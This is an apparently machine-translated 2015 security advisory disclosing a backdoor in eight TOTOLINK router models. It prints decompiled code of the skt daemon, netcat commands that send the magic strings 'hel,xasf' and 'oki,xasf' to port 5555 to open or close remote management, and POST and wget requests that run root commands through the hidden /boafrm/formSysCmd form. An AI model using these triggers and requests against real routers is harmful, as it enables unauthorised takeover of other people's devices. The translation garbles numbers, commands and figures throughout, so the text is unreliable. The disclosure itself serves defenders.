Occupy South Korea 8 0%market TOTOLINK router was traced to the presence of the back door, affecting 5 million router-vulnerability warning-the black bar safety net

2015-07-18T00:00:00
ID MYHACK58:62201564794
Type myhack58
Reporter 佚名
Modified 2015-07-18T00:00:00

Description

TOTOLINK router in the Korean market share of 8 2. 3 per cent. By Shenzhen Zhong Tang tech company responsible for the product development and manufacturing. Vulnerability description By analyzing the most recent firmware as well as in a real router on the test after researchers found that 8 TOTOLink products in the presence of the back door. Note: the firmware from totolink. net and totolink. cn A850R-V1 : the latest firmware TOTOLINK-A850R-V1. 0. 1-B20150707. 1 6 1 2. web F1-V2 : latest firmware F1-V2. 1. 1-B20150708. 1 6 4 6. web F2-V1 : the latest firmware F2-V2. 1. 0-B20150320. 1 6 1 1. web N150RT-V2 : latest firmware TOTOLINK-N150RT-V2. 1. 1-B20150708. 1 5 4 8. web N151RT-V2 : latest firmware TOTOLINK-N151RT-V2. 1. 1-B20150708. 1 5 5 9. web N300RH-V2 : latest firmware TOTOLINK-N300RH-V2. 0. 1-B20150708. 1 6 2 5. web N300RH-V3 : latest firmware TOTOLINK-N300RH-V3. 0. 0-B20150331. 0 8 5 8. web N300RT-V2 : latest firmware TOTOLINK-N300RT-V2. 1. 1-B20150708. 1 6 1 3. web Through to the WAN IP of sending a carefully constructed request, an attacker can in the online open HTTP Remote Management Interface. Then the attacker in HTTP original management interface through the hidden/boafrm/formSysCmd used in the form of remote code execution, and thus bypass the authentication system. Preliminary estimates there are about 5 million router by back door influence. Back door details When the router starts after the int. d the script will execute/bin/skt file cat etc/init. d/rcS [...]

start web server

boa skt& amp; skt is a MIPS architecture file, its parameters: server: ./ skt client: ./ skt host cmd Using the simulator, The binary file can be compatible with the x86_64 machine: sudo chroot . ./ qemu-mips-static. a/ bin/skt Used alone skt without any parameters, will enable a port 5 5 5 5 TCP protection program, acting as an echo server role. Using the band parameters of the skt will by 5 5 5 5 Port to the target IP to send an include command to the TCP packet. skt's main features: TcpClient is a simple TCP client TcpServer like an Echo Server TcpClient:sends a containing hel,xasf, oki,xasf or bye,xasf TCP packet, which depends on the parameters used(1,2,3) TcpServer:used to monitor the tcp/5 of 5 5 of 5 the Echo Server and comparing the user-provided hard-coded string("hel,xasf", "oki,xasf"). sub_400B50 function: ! sub_400B50 function pseudo code: int32_t sub_400B50(int32_t a1, char *str, int32_t a3, int32_t a4, int32_t a5) { if (strcmp(str, "hel,xasf") == 0) { system("iptables-I INPUT-p tcp --dport 8 0-i eth1-j ACCEPT"); } else { if (strcmp(str, "oki,xasf") == 0) { system("iptables-D INPUT-p tcp --dport 8 0-i eth1-j ACCEPT"); } } [...] } This function compares the user specified string, 2 hard-coded string to execute system () it. Analysis run on TOTOLINK device on the binary file, the display server through the silent execution of system()in response to a command 1. By "hel,xasf"sent to the device, the device will perform: iptables-I INPUT-p tcp --dport 8 0-i eth1-j ACCEPT This will be the eth1 interface is the default WAN interface 8 0 the port is open HTTP Remote Management Interface 2. By"oki,xasf"sent to the device, the device will perform: iptables-D INPUT-p tcp –dport 8 0-i eth1-j ACCEPT This is off HTTP the original Management Interface 3. By sending a"bye,xasf"to the device, the device won't do. The back door of the iptables command is"eth1"hard-coded, only the use of DHCP and static IP connected devices will be affected, because the WAN IP is dependent on the eth1 device, and for a PPPoE connection without any impact totolink# ifconfig ppp0 Link encap:Point-to-Point Protocol inet addr:X. X. X. X P-t-P:X. X. X. X Mask:255.255.255.255 UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1 4 3 8 Metric:1 RX packets:1 7 3 0 8 3 9 8 errors:0 dropped:0 overruns:0 frame:0 TX packets:2 6 0 5 2 9 0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:6 4 RX bytes:2 8 0 3 1 3 8 4 5 5 (2.6 GiB) TX bytes:2 7 7 4 0 2 4 9 2 (264.5 MiB) An attacker can use a simple netcat commands to test the back door: the 1. Open HTTP Remote Management Interface echo-ne "hel,xasf" | nc 5 5 5 5 2. Close the HTTP Remote Management Interface echo-ne "oki,xasf" | nc 5 5 5 5 3. Detection-containing vulnerability the router echo-ne "GET / HTTP/1.1" | nc 5 5 5 5 if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router. Through the back door to open HTTP Remote Management Interface: ! The router Management page of the remote command execution vulnerability In the latest firmware in a hidden window allows attackers with root privileges to perform the command: POST /boafrm/formSysCmd HTTP/1.1 sysCmd=&apply=Apply&msg= An attacker can use wget on the remote device execute command: wget --post-data='sysCmd=&apply=Apply&msg=' http://ip//boafrm/formSysCmd For example, the Management Interface sends the HTTP request, you can remotely restart the device: POST /boafrm/formSysCmd HTTP/1.1 sysCmd=reboot&apply=Apply&msg= The following wget command and the above command like this: wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd